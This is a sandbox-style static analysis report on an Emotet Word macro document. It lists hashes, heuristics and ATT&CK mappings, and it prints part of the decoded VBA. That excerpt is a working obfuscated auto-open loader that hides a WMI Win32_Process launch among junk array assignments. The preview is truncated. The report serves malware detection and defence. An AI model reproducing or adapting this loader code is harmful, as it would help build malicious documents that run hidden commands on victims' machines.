Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 b17213bfb8a22ff2…

MALICIOUS

Office (OLE)

124.6 KB Created: 2019-05-20 18:13:00 Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: c87862331ac0364634c10b72cb8dd3a3 SHA-1: cad083aad1ef654dfbb6e8d9957e1dc9e242f1f9 SHA-256: b17213bfb8a22ff2a198592df2a0baf8d02f92eb3ec7b3699c5f292b5f6a7a04
342 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The sample contains critical heuristic firings indicating an obfuscated auto-exec VBA loader designed to execute a payload. The presence of the 'autoopen' macro and the 'GetObject' call further support this. ClamAV detection explicitly names this as Emotet, a known downloader family.

Heuristics 9

  • ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4206 bytes
SHA-256: a92eee10183ae041d18ad60405c473226dc0c8abad5e81ca8cc2d260c5457bce
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "I811_2"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "X_31642, 0, 0, MSForms, TextBox"
Attribute VB_Control = "L16662, 1, 1, MSForms, TextBox"

Attribute VB_Name = "q12644_"
Sub d8776626()
   Dim Y0247487()
      ReDim Y0247487(24864)
      Y0247487(24744) = "627199811" + "907303612" + "12425063"
      Y0247487(24729) = "87680550" + "606261060"
      Y0247487(24829) = "896301423" + "445210771"
      Y0247487(24754) = "364195319" + "808704564" + "922864956"
      Y0247487(24714) = "36584079" + "779570041"
      Y0247487(24784) = "205639954" + "440920310"
   Dim p031_7()
      ReDim p031_7(24864)
      p031_7(24744) = "719802697" + "964398285" + "191176996"
      p031_7(24729) = "190802845" + "947555802"
      p031_7(24829) = "363950012" + "284639939"
      p031_7(24754) = "20712113" + "713566333" + "323232271"
      p031_7(24714) = "317340377" + "663752868"
      p031_7(24784) = "623686699" + "480409517"
End Sub
Sub _
autoopen( _
)
   Dim j0100899()
      ReDim j0100899(47911)
      j0100899(47853) = "831892424" + "623581217" + "278161893"
      j0100899(47854) = "553839367" + "875808733"
      j0100899(47881) = "394684919" + "288346731"
      j0100899(47815) = "278984084" + "214912338" + "481173501"
      j0100899(47736) = "26749023" + "403687659"
      j0100899(47764) = "445119542" + "811100338"
c4420699
   Dim G43598_4()
      ReDim G43598_4(1007)
      G43598_4(880) = "948270363" + "526529949" + "747711125"
      G43598_4(833) = "172870975" + "817318495"
      G43598_4(934) = "812783548" + "496694827"
      G43598_4(973) = "195141411" + "262390936" + "49209422"
      G43598_4(886) = "806147999" + "466204719"
      G43598_4(960) = "929989600" + "917556520"
End Sub
Sub c4420699()
   Dim P7382704()
      ReDim P7382704(1007)
      P7382704(880) = "250999004" + "675235840" + "744922082"
      P7382704(833) = "422359893" + "845857177"
      P7382704(934) = "296230093" + "672977116"
      P7382704(973) = "182560622" + "313314638" + "617957021"
      P7382704(886) = "93109596" + "501257154"
      P7382704(960) = "925283675" + "772593957"
Set F72913 = GetObject(CStr("Winmgmt" + _
"s:Win32_ProcesSstartup"))
   Dim R4796061()
      ReDim R4796061(53102)
      R4796061(53006) = "612394091" + "736479700" + "727340033"
      R4796061(53011) = "367165601" + "156288858"
      R4796061(52985) = "134454598" + "868542883"
      R4796061(52933) = "641109693" + "662142160" + "594096699"
      R4796061(53034) = "510383652" + "416840218"
      R4796061(53055) = "138466033" + "386976466"
F72913. _
ShowWindow = vbFalse - vbFalse
   Dim j04_07()
      ReDim j04_07(76150)
      j04_07(76116) = "876809162" + "83743505" + "375556447"
      j04_07(76037) = "286037766" + "533142935"
      j04_07(76038) = "538119040" + "752747608"
      j04_07(76095) = "310822791" + "692415985" + "711354002"
      j04_07(76057) = "936175451" + "11523341"
      j04_07(76037) = "614710358" + "27877687"
Set C71525 = GetObject(CStr("Winmgmt" + _
"s:Win32_ProcesS"))
   Dim c0064862()
      ReDim c0064862(76150)
      c0064862(76116) = "916634029" + "247500470" + "906703586"
      c0064862(76037) = "996985723" + "675937696"
      c0064862(76038) = "582753707" + "459440517"
      c0064862(76095) = "586765188" + "846752756" + "311546239"
      c0064862(76057) = "473487155" + "182263562"
      c0064862(76037) = "460036999" + "265558348"
C71525.Create E17204__ + "po" + O91_010 + I811_2.L16662 + I811_2.X_31642 + k09_8_, E92918, F72913, I7310_
   Dim J1831608()
      ReDim J1831608(29245)
      J1831608(29142) = "965104020" + "760544860" + "331550039"
      J1831608(29114) = "527310352" + "861044921"
      J1831608(29089) = "759708522" + "909355294"
      J1831608(29154) = "674406536" + "533441435" + "716112725"
      J1831608(29107) = "216179042
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.